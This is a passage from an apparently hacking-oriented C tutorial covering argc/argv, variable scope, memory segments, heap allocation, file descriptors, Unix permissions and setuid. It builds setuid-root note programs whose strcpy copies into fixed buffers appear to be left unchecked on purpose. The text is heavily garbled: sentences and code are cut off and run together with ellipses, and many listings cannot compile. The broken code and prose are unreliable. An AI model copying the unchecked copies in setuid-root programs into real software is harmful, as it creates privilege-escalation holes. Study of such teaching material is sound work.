Command-Line Arguments

Many nongraphical programs receive input in the form of command-line
arguments
...
This tends
to be more efficient and is a useful input method
...
The integer will contain the number of arguments, and
the array of strings will contain each of those arguments
...
c
program and its execution should explain things
...
c
#include ...
c
reader@hacking:~/booksrc $
...
/commandline
reader@hacking:~/booksrc $
...
/commandline
argument #1
this
argument #2
is
argument #3
a
argument #4
test
reader@hacking:~/booksrc $

The zeroth argument is always the name of the executing binary, and
the rest of the argument array (often called an argument vector) contains the
remaining arguments as strings
...
Regardless of this, the argument is passed in
as a string; however, there are standard conversion functions
...
The most common of these functions is atoi(),
which is short for ASCII to integer
...
Observe its usage
in convert
...

convert
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
if(argc < 3) // If fewer than 3 arguments are used,
usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert
...

reader@hacking:~/booksrc $ gcc convert
...
/a
...
/a
...
/a
...

0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $

In the preceding code, an if statement makes sure that three arguments
are used before these strings are accessed
...
In C it’s important to check for these types of conditions and handle them in program logic
...
The convert2
...

convert2
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
// if(argc < 3) // If fewer than 3 arguments are used,
// usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert2
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
Segmentation fault (core
reader@hacking:~/booksrc

$ gcc convert2
...
/a
...

This results in the program crashing due to a segmentation fault
...
When the program attempts to access an address
that is out of bounds, it will crash and die in what’s called a segmentation fault
...

reader@hacking:~/booksrc $ gcc -g convert2
...
/a
...
so
...

(gdb) run test
Starting program: /home/reader/booksrc/a
...

0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
(gdb) where
#0 0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
#1 0xb800183c in ?? ()
#2 0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2
...

(gdb) run test
The program being debugged has been started already
...
out test
Breakpoint 1, main (argc=2, argv=0xbffff894) at convert2
...

Program received signal SIGSEGV, Segmentation fault
...
so
...
out"
(gdb) x/s 0xbffff9ce
0xbffff9ce:
"test"
(gdb) x/s 0x00000000
0x0:

(gdb) quit
The program is running
...
The where command will
sometimes show a useful backtrace of the stack; however, in this case, the
stack was too badly mangled in the crash
...
Since the argument vector is a pointer to a list of strings, it is actually a
pointer to a list of pointers
...
The first one is the zeroth argument,
the second is the test argument, and the third is zero, which is out of bounds
...

0x267

Variable Scoping

Another interesting concept regarding memory in C is variable scoping or
context—in particular, the contexts of variables within functions
...
In fact, multiple calls to the same function all have their own contexts
...
c
...
c
#include ...

reader@hacking:~/booksrc $ gcc scope
...
/a
...

Notice that within the main() function, the variable i is 3, even after calling
func1() where the variable i is 5
...
The best
way to think of this is that each function call has its own version of the
variable i
...
Variables are global if they are defined at the beginning
of the code, outside of any functions
...
c example code shown
below, the variable j is declared globally and set to 42
...

scope2
...
h>
int j = 42; // j is a global variable
...

printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}
void func2() {
int i = 7;
printf("\t\t[in func2] i = %d, j = %d\n", i, j);
printf("\t\t[in func2] setting j = 1337\n");
j = 1337; // Writing to j
func3();
printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}
void func1() {
int i = 5;
printf("\t[in func1] i = %d, j = %d\n", i, j);
func2();
printf("\t[back in func1] i = %d, j = %d\n", i, j);
}
int main() {
int i = 3;
printf("[in main] i = %d, j = %d\n", i, j);
func1();
printf("[back in main] i = %d, j = %d\n", i, j);
}

The results of compiling and executing scope2
...

reader@hacking:~/booksrc $ gcc scope2
...
/a
...
In this case, the compiler prefers to use the local variable
...
The global variable j is just
stored in memory, and every function is able to access that memory
...
Printing the memory addresses of these
variables will give a clearer picture of what's going on
...
c example
code below, the variable addresses are printed using the unary address-of
operator
...
c
#include ...

void func3() {
int i = 11, j = 999; // Here, j is a local variable of func3()
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
[in func1] i @ 0xbffff814 = 5
[in func1] j @ 0x08049988 = 42
[in func2] i @ 0xbffff7f4 = 7
[in func2] j @ 0x08049988 = 42
[in func2] setting j = 1337
[in func3] i @ 0xbffff7d4 = 11
[in func3] j @ 0xbffff7d0 = 999
[back in func2] i @ 0xbffff7f4 = 7
[back in func2] j @ 0x08049988 = 1337
[back in func1] i @ 0xbffff814 = 5
[back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

In this output, it is obvious that the variable j used by func3() is different
than the j used by the other functions
...

Also, notice that the variable i is actually at a different memory address in each
function
...
Then the backtrace command shows the record of each function call
on the stack
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
3 int j = 42; // j is a global variable
...

7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8 printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9 }
10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:7
7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0 func3 () at scope3
...
c:17
#2 0x0804849f in func1 () at scope3
...
c:35
(gdb)

The backtrace also shows the nested function calls by looking at records
kept on the stack
...
Each line in the backtrace corresponds to a stack frame
...
The local
variables contained in each stack frame can be shown in GDB by adding the
word full to the backtrace command
...
c:7
i = 11
j = 999
#1 0x0804841d in func2 () at scope3
...
c:26
i = 5
#3 0x0804852b in main () at scope3
...
The global version of the variable j is used in the other
function’s contexts
...
Similar to global
variables, a static variable remains intact between function calls; however, static
variables are also akin to local variables since they remain local within a particular function context
...
The code in static
...

static
...
h>
void function() { // An example function, with its own context
int var = 5;
static int static_var = 5; // Static variable initialization
printf("\t[in function] var = %d\n", var);
printf("\t[in function] static_var = %d\n", static_var);
var++; // Add one to var
...

}
int main() { // The main function, with its own context
int i;
static int static_var = 1337; // Another static, in a different context
for(i=0; i < 5; i++) { // Loop 5 times
...

}
}

The aptly named static_var is defined as a static variable in two places:
within the context of main() and within the context of function()
...
The function simply prints the values of the two variables in its context and then adds 1 to both of them
...

reader@hacking:~/booksrc $ gcc static
...
/a
...
This is because static variables retain their values, but also because
they are only initialized once
...

Once again, printing the addresses of these variables with the unary
address-of operator will provide greater visibility into what’s
really going on
...
c for an example
...
c
#include ...

static_var++; // Add 1 to static_var
...

}
}

The results of compiling and executing static2
...

reader@hacking:~/booksrc $ gcc static2
...
/a
...

You may have noticed that the local variables all have very
high addresses, like 0xbffff814, while the global and static variables all have
very low memory addresses, like 0x0804968c and 0x8049688
...
Read on for your answers
...
Each segment represents a special portion of memory that is
set aside for a certain purpose
...
This is where
the assembled machine language instructions of the program are located
...
As a program
executes, the EIP is set to the first instruction in the text segment
...

1. Reads the instruction that EIP is pointing to
2. ...
3. Executes the instruction that was read in step 1
4. ...
The processor doesn’t
care about the change, because it’s expecting the execution to be nonlinear
anyway
...

Write permission is disabled in the text segment, as it is not used to store
variables, only code
...
Another advantage of this segment being read-only is that it
can be shared among different copies of the program, allowing multiple
executions of the program at the same time without any problems
...

The data and bss segments are used to store global and static program
variables
...
Although
these segments are writable, they also have a fixed size
...
Both global and static variables are able to persist
because they are stored in their own memory segments
...
Blocks of memory in this segment can be allocated and used for
whatever the programmer might need
...

All of the memory within the heap is managed by allocator and deallocator
algorithms, which respectively reserve a region of memory in the heap for
use and remove reservations to allow that portion of memory to be reused
for later reservations
...
This means a programmer using the heap
allocation functions can reserve and free memory on the fly
...

The stack segment also has variable size and is used as a temporary scratch
pad to store local function variables and context during function calls
...
When a program calls a function,
that function will have its own set of passed variables, and the function’s code
will be at a different memory location in the text (or code) segment
...
All of this information is stored together on the stack in what is
collectively called a stack frame
...

In general computer science terms, a stack is an abstract data structure
that is used frequently
...
Think of it
as putting beads on a piece of string that has a knot on one end—you can’t
get the first bead off until you have removed all the other beads
...

As the name implies, the stack segment of memory is, in fact, a stack data
structure, which contains stack frames
...
Since this is very dynamic behavior, it
makes sense that the stack is also not of a fixed size
...

The FILO nature of a stack might seem odd, but since the stack is used
to store context, it’s very useful
...
The EBP register—sometimes
called the frame pointer (FP) or local base (LB) pointer—is used to reference local
function variables in the current stack frame
...
The SFP is used to restore EBP to its previous value, and the
return address is used to restore EIP to the next instruction found after the
function call
...

The following stack_example
...

stack_example
...
The local variables for the function
include a single character called flag and a 10-character buffer called buffer
...
After
compiling the program, its inner workings can be examined with GDB
...
The main() function starts at 0x08048357 and test_function()
starts at 0x08048344
...
These instructions are collectively called
the procedure prologue or function prologue
...
Sometimes
the function prologue will handle some stack alignment as well
...

reader@hacking:~/booksrc $ gcc -g stack_example
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main():
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax
0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1
0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
0x08048344 : push ebp
0x08048345 : mov ebp,esp
0x08048347 : sub esp,0x28
0x0804834a : mov DWORD PTR [ebp-12],0x7a69
0x08048351 : mov BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
(gdb)

When the program is run, the main() function is called, which simply calls
test_function()
...

When test_function() is called, the function arguments are pushed onto the
stack in reverse order (since it’s FILO)
...
These values correspond to the variables d, c, b, and a in the
function
...

(gdb) disass main
Dump of assembler code for function main:
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax
0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1
0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb)

Next, when the assembly call instruction is executed, the return
address is pushed onto the stack and the execution flow jumps to the start of
test_function() at 0x08048344
...
In this case, the
return address would point to the leave instruction in main() at 0x0804838b
...
In this step, the current
value of EBP is pushed to the stack
...

The current value of ESP is then copied into EBP to set the new frame pointer
...
Memory is saved for these variables by subtracting from
ESP
...
In the
following output, a breakpoint is set in main() before the call to test_function()
and also at the beginning of test_function()
...
When the program is
run, execution stops at the breakpoint, where the registers ESP (stack pointer),
EBP (frame pointer), and EIP (instruction pointer) are examined
...
c, line 10
...
c, line 5
...
out
Breakpoint 1, main () at stack_example
...
This means the bottom of this new stack frame is at the current
value of ESP, 0xbffff7f0
...
The
output below shows similar information at the second breakpoint
...

(gdb) cont
Continuing
...
c:5
5
flag = 31337;
(gdb) i r esp ebp eip
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7e8 0xbffff7e8
eip 0x804834a 0x804834a
(gdb) disass test_function
Dump of assembler code for function test_function:
0x08048344 : push ebp
0x08048345 : mov ebp,esp
0x08048347 : sub esp,0x28
0x0804834a : mov DWORD PTR [ebp-12],0x7a69
0x08048351 : mov BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
...
The four arguments to
the function can be seen at the bottom of the stack frame, with the return
address found directly on top
...
The rest of
the memory is saved for the local stack variables: flag and buffer
...
Memory for the flag variable is shown at and memory for the
buffer variable is shown at
...

After the execution finishes, the entire stack frame is popped off of the
stack, and the EIP is set to the return address so the program can continue
execution
...
As each function ends, its
stack frame is popped off of the stack so execution can be returned to the
previous function
...

The various segments of memory are arranged in the order they
were presented, from the lower memory addresses to the higher memory
addresses
...

Some texts have this reversed, which can be very confusing; so for this
book, smaller memory addresses are always shown at the top
...

Since the heap and the stack are both dynamic, they both grow
...
This minimizes wasted space, allowing the stack to be larger if the
...

[Figure: memory segment layout. Low addresses are at the top, starting with the text (code) segment; the heap grows down toward higher memory addresses; the stack grows up toward lower memory addresses; the stack segment sits at the high addresses.]

0x271

Memory Segments in C

In C, as in other compiled languages, the compiled code goes into the text
segment, while the variables reside in the remaining segments
...
Variables that are defined outside of any functions are considered
to be global
...
If static or global variables are initialized with data, they are stored in the data memory segment; otherwise, these
variables are put in the bss memory segment
...
Usually, pointers are used to reference memory on the heap
...
Since the stack can contain many different stack frames, stack
variables can maintain uniqueness within different functional contexts
...
c program will help explain these concepts in C
...
c
#include ...

int stack_var; // Notice this variable has the same name as the one in main()
...

printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);
// These variables are in the bss segment
...

printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);
// These variables are in the stack segment
...
The global and static variables are declared as described
earlier, and initialized counterparts are also declared
...
The heap variable is actually declared as an integer pointer, which
will point to memory allocated on the heap memory segment
...
Since the newly allocated
memory could be of any data type, the malloc() function returns a void
pointer, which needs to be typecast into an integer pointer
...
c
reader@hacking:~/booksrc $
...
out
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0
static_var is at address 0x080497f8
global_var is at address 0x080497fc
heap_var is at address 0x0804a008

stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hacking:~/booksrc $

The first two initialized variables have the lowest memory addresses,
since they are located in the data memory segment
...
These memory addresses are slightly larger than the previous
variables’ addresses, since the bss segment is located below the data segment
...

The heap variable is stored in space allocated on the heap segment,
which is located just below the bss segment
...
Finally,
the last two stack_vars have very large memory addresses, since they are located
in the stack segment
...

This allows both memory segments to be dynamic without wasting space in
memory
...
The second stack_var in function() has its
own unique context, so that variable is stored within a different stack frame
in the stack segment
...
Since the stack grows back up toward the heap segment
with each new stack frame, the memory address for the second stack_var
(0xbffff814 ) is smaller than the address for the first stack_var (0xbffff834 )
found within main()’s context
...
However, using the heap requires a bit more effort
...
This function accepts a size as its only argument and reserves that
much space in the heap segment, returning the address to the start of this
memory as a void pointer
...

The corresponding deallocation function is free()
...
These relatively simple functions are demonstrated
in heap_example
...

heap_example
...
h>
#include ...
h>

int main(int argc, char *argv[]) {
char *char_ptr; // A char pointer
int *int_ptr; // An integer pointer
int mem_size;
if (argc < 2) // If there aren't command-line arguments,
mem_size = 50; // use 50 as the default value
...
\n");
exit(-1);
}
strcpy(char_ptr, "This is memory is located on the heap
...
\n");
exit(-1);
}
*int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing
...
\n");
free(char_ptr); // Freeing heap memory
printf("\t[+] allocating another 15 bytes for char_ptr\n");
char_ptr = (char *) malloc(15); // Allocating more heap memory
if(char_ptr == NULL) { // Error checking, in case malloc() fails
fprintf(stderr, "Error: could not allocate heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
Then it uses the malloc() and
free() functions to allocate and deallocate memory on the heap
...
Since malloc() doesn’t know what type of memory it’s
allocating, it returns a void pointer to the newly allocated heap memory,
which must be typecast into the appropriate type
...
If the allocation fails and the pointer is NULL, fprintf() is used to
print an error message to standard error and the program exits
...
This function will be
explained more later, but for now, it’s just used as a way to properly display
an error
...

reader@hacking:~/booksrc $ gcc -o heap_example heap_example
...
/heap_example
[+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

In the preceding output, notice that each block of memory has an incrementally higher memory address in the heap
...
The heap allocation functions control this
behavior, which can be explored by changing the size of the initial memory
allocation
...
/heap_example 100
[+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

If a larger block of memory is allocated and then deallocated, the final
15-byte allocation will occur in that freed memory space, instead
...
Often, simple
informative printf() statements and a little experimentation can reveal many
things about the underlying system
...
c, there were several error checks for the malloc() calls
...
But with multiple malloc() calls, this error-checking code needs to appear in multiple places
...
Since all the error-checking code is basically the same for every malloc() call, this is a perfect
place to use a function instead of repeating the same instructions in multiple
places
...
c for an example
...
c
#include ...
h>
#include ...

else
mem_size = atoi(argv[1]);
printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory
strcpy(char_ptr, "This is memory is located on the heap
...

printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);
printf("\t[-] freeing char_ptr's heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
\n");
exit(-1);
}
return ptr;
}

The errorchecked_heap
...
c code, except the heap memory allocation and
error checking have been gathered into a single function
...
This lets
the compiler know that there will be a function called errorchecked_malloc() that
expects a single, unsigned integer argument and returns a void pointer
...
The function itself is quite simple; it just accepts the size in bytes to
allocate and attempts to allocate that much memory using malloc()
...

This way, the custom errorchecked_malloc() function can be used in place of
a normal malloc(), eliminating the need for repetitious error checking afterward
...

0x280

Building on Basics
Once you understand the basic concepts of C programming, the rest is pretty
easy
...
In fact,
if the functions were removed from any of the preceding programs, all that
would remain are very basic statements
...
File descriptors use a set of low-level I/O functions, and filestreams are
a higher-level form of buffered I/O that is built on the lower-level functions
...
In this book, the focus will be on the low-level
I/O functions that use file descriptors
...
Because this
number is unique among the other books in a bookstore, the cashier can
scan the number at checkout and use it to reference information about this
book in the store’s database
...
Four common functions that use file descriptors
are open(), close(), read(), and write()
...
The open() function opens a file for reading and/or writing
and returns a file descriptor
...
The file descriptor is passed as an
argument to the other functions like a pointer to the opened file
...
The read() and
write() functions’ arguments are the file descriptor, a pointer to the data to
read or write, and the number of bytes to read or write from that location
...
These flags and
their usage will be explained in depth later, but for now let’s take a look at a
simple note-taking program that uses file descriptors—simplenote
...
This
program accepts a note as a command-line argument and then adds it to the
end of the file /tmp/notes
...
Other functions are used to display a usage message and to handle fatal errors
...

simplenote
...
h>
...
h>
...
h>

void usage(char *prog_name, char *filename) {
printf("Usage: %s <data to add to %s>\n", prog_name, filename);
exit(0);
}
void fatal(char *); // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper
int main(int argc, char *argv[]) {
int fd; // file descriptor
char *buffer, *datafile;
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/tmp/notes");
if(argc < 2) // If there aren't command-line arguments,
usage(argv[0], datafile); // display usage message and exit
...

printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);
strncat(buffer, "\n", 1); // Add a newline on the end
...
\n");
free(buffer);
free(datafile);
}
// A function to display an error message and then exit
void fatal(char *message) {
char error_message[100];
strcpy(error_message, "[!!] Fatal Error ");
strncat(error_message, message, 83);
perror(error_message);
exit(-1);
}
// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
void *ptr;
ptr = malloc(size);
if(ptr == NULL)
fatal("in ec_malloc() on memory allocation");
return ptr;
}

Besides the strange-looking flags used in the open() function, most of this
code should be readable
...
The strlen() function accepts a string and returns its
length
...
The perror() function is short for print error and is
used in fatal() to print an additional error message (if it exists) before exiting
...
c
reader@hacking:~/booksrc $
...
/simplenote
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
great, it works
reader@hacking:~/booksrc $

The output of the program’s execution is pretty self-explanatory, but
there are some things about the source code that need further explanation
...
h and sys/stat
...
The first set of flags is found in fcntl
...
The access mode must use at least one of
the following three flags:
O_RDONLY  Open file for read-only access
O_WRONLY  ...
O_RDWR    Open file for both read and write access
...
A few of the more common and useful of these flags are
as follows:
O_APPEND  Write data at the end of the file
O_TRUNC   ...
O_CREAT   Create the file if it doesn’t exist
...
When two bits enter an OR gate, the result is 1 if either the first bit or the
second bit is 1
...
Full 32-bit values can use these bitwise operators to
perform logic operations on each corresponding bit
...
c and the program output demonstrate these bitwise operations
...
c
#include ...

bit_b = (i & 1); // Get the first bit
...

bit_b = (i & 1); // Get the first bit
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
bitwise OR operator |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1
bitwise AND operator &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1
reader@hacking:~/booksrc $

The flags used for the open() function have values that correspond to
single bits
...
The fcntl_flags
...
h and how they combine with each other
...
c
#include ...
h>
void display_flags(char *, unsigned int);
void binary_print(unsigned int);
int main(int argc, char *argv[]) {
display_flags("O_RDONLY\t\t", O_RDONLY);
display_flags("O_WRONLY\t\t", O_WRONLY);
display_flags("O_RDWR\t\t\t", O_RDWR);
printf("\n");
display_flags("O_APPEND\t\t", O_APPEND);
display_flags("O_TRUNC\t\t\t", O_TRUNC);
display_flags("O_CREAT\t\t\t", O_CREAT);

printf("\n");
display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}
void display_flags(char *label, unsigned int value) {
printf("%s\t: %d\t:", label, value);
binary_print(value);
printf("\n");
}
void binary_print(unsigned int value) {
unsigned int mask = 0xff000000; // Start with a mask for the highest byte
...

unsigned int byte, byte_iterator, bit_iterator;
for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
byte = (value & mask) / shift; // Isolate each byte
...

if(byte & 0x80) // If the highest bit in the byte isn't 0,
printf("1"); // print a 1
...

byte *= 2; // Move all the bits to the left by 1
...

shift /= 256; // Move the bits in shift right by 8
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
O_RDONLY                  : 0    : 00000000 00000000 00000000 00000000
O_WRONLY                  : 1    : 00000000 00000000 00000000 00000001
O_RDWR                    : 2    : 00000000 00000000 00000000 00000010

O_APPEND                  : 1024 : 00000000 00000000 00000100 00000000
O_TRUNC                   : 512  : 00000000 00000000 00000010 00000000
O_CREAT                   : 64   : 00000000 00000000 00000000 01000000

O_WRONLY|O_APPEND|O_CREAT : 1089 : 00000000 00000000 00000100 01000001
reader@hacking:~/booksrc $

Using bit flags in combination with bitwise logic is an efficient and commonly used technique
...
In fcntl_flags
...
This technique only works
when all the bits are unique, though
...

This argument uses bit flags defined in sys/stat
...

S_IRUSR  Give the file read permission for the user (owner)
...
S_IXUSR  Give the file execute permission for the user (owner)
...
S_IWGRP  Give the file write permission for the group
...
S_IROTH  Give the file read permission for other (anyone)
...
S_IXOTH  Give the file execute permission for other (anyone)
...
If they don’t make sense, here’s a crash course in
Unix file permissions
...
These values can be displayed using
ls -l and are shown below in the following output
...
c

For the /etc/passwd file, the owner is root and the group is also root
...

Read, write, and execute permissions can be turned on and off for three
different fields: user, group, and other
...
These fields are also displayed in the front of the
ls -l output
...
The next three
characters display the group permissions, and the last three characters are
for the other permissions
...
Each permission corresponds to a bit flag; read is 4 (100 in binary), write is 2 (010 in binary), and
execute is 1 (001 in binary)
...
These values can be added together to define permissions for
user, group, and other using the chmod command
...
c
ls -l simplenote
...
c
chmod ugo-wx simplenote
...
c
1826 2007-09-07 02:51 simplenote
...
c
ls -l simplenote
...
c

The first command (chmod 731) gives read, write, and execute permissions to
the user, since the first number is 7 (4 + 2 + 1), write and execute permissions
to group, since the second number is 3 (2 + 1), and only execute permission to other, since the third number is 1
...
In the next chmod command, the argument ugo-wx
means "subtract write and execute permissions from user, group, and other"
...

In the simplenote program, the open() function uses S_IRUSR|S_IWUSR for
its additional permission argument, which means the /tmp/notes file should
only have user read and write permission when it is created
...
This user ID can
be displayed using the id command
...
The su command can be used to switch to a different user, and if this command is run as root, it can be done without a password
...

On the LiveCD, sudo has been configured so it can be executed without a password, for simplicity’s sake
...

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

As the user jose, the simplenote program will run as jose if it is executed,
but it won’t have access to the /tmp/notes file
...

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $
...
For example, the /etc/passwd file contains account
information for every user on the system, including each user’s default login
shell
...

This program needs to be able to make changes to the /etc/passwd file, but
only on the line that pertains to the current user’s account
...
This is an additional file permission bit that can be set using chmod
...

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root 1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

The chsh program has the setuid flag set, which is indicated by an s in the
ls output above
...

The /etc/passwd file that chsh writes to is also owned by root and only allows
the owner to write to it
...
This
means that a running program has both a real user ID and an effective user
ID
...
c
...
c
#include ...
c are as follows
...
c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
c, both user IDs are shown to be 999 when
uid_demo is executed, since 999 is the user ID for reader
...
The program can still be executed, since it has execute
permission for other, and it shows that both user IDs remain 999, since
that’s still the ID of the user
...
/uid_demo
chmod: changing permissions of `
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
The chmod u+s command turns on the setuid permission, which can be seen in the following ls -l output
...
This is how the chsh program is able to allow
any user to change his or her login shell stored in /etc/passwd
...

The next program will be a modification of the simplenote program; it will
also record the user ID of each note’s original author
...

The ec_malloc() and fatal() functions have been useful in many of our
programs
...

hacking
...
h, the functions can just be included
...
If the filename
is surrounded by quotes, the compiler looks in the current directory
...
h is in the same directory as a program, it can be included
with that program by typing #include "hacking
...

The changed lines for the new notetaker program (notetaker
...

notetaker
...
h>
...
h>
...
h>
"hacking
...

strcpy(buffer, argv[1]); // Copy into buffer
...

// Writing data
if(write(fd, &userid, 4) == -1) // Write user ID before note data
...

if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
The getuid() function is used to
get the real user ID, which is written to the datafile on the line before the note’s
line is written
...

reader@hacking:~/booksrc $ gcc -o notetaker notetaker
...
/notetaker
reader@hacking:~/booksrc $ sudo chmod u+s
...
/notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48
...
/notetaker "this is a test of multiuser notes"
[DEBUG] buffer   @ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
Now when the program
is executed, the program runs as the root user, so the file /var/notes is also
owned by root when it is created
...
this is a t|
|est of multiuser|
| notes
...

Because of little-endian architecture, the 4 bytes of the integer 999 appear
reversed in hexadecimal (shown in bold above)
...
The notesearch
...
Additionally, an
optional command-line argument can be supplied for a search string
...

notesearch
...
h>
...
h>
...
h"

#define FILENAME "/var/notes"
int print_notes(int, int, char *); // Note printing function
int find_user_note(int, int); // ...
int search_note(char *, char *); // Search for keyword function
void fatal(char *); // ...
...

userid = getuid();
fd = open(FILENAME, O_RDONLY); // Open the file for read-only access
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0
...

note_buffer[note_length] = 0; // Terminate the string
...

return 1;
}
// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note
...

if(read(fd, &note_uid, 4) != 4) // Read the uid data
...

if(read(fd, &byte, 1) != 1) // Read the newline separator
...

if(read(fd, &byte, 1) != 1) // Read a single byte
...

length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes
...

int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0) // If there is no search string,
return 1; // always "match"
...

if(note[i] == keyword[match]) // If byte matches keyword,
match++; // get ready to check the next byte;
else { // otherwise,
if(note[i] == keyword[0]) // if that byte matches first keyword byte,
match = 1; // start the match count at 1
...

}
if(match == keyword_length) // If there is a full match,
return 1; // return matched
...

}

Most of this code should make sense, but there are some new concepts
...
Also, the
function lseek() is used to rewind the read position in the file
...

Since this turns out to be a negative number, the position is moved backward
by length bytes
...
c
sudo chown root:root
...
/notesearch

...
But this is just a single user; what happens if a different user uses
the notetaker and notesearch programs?
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $
...

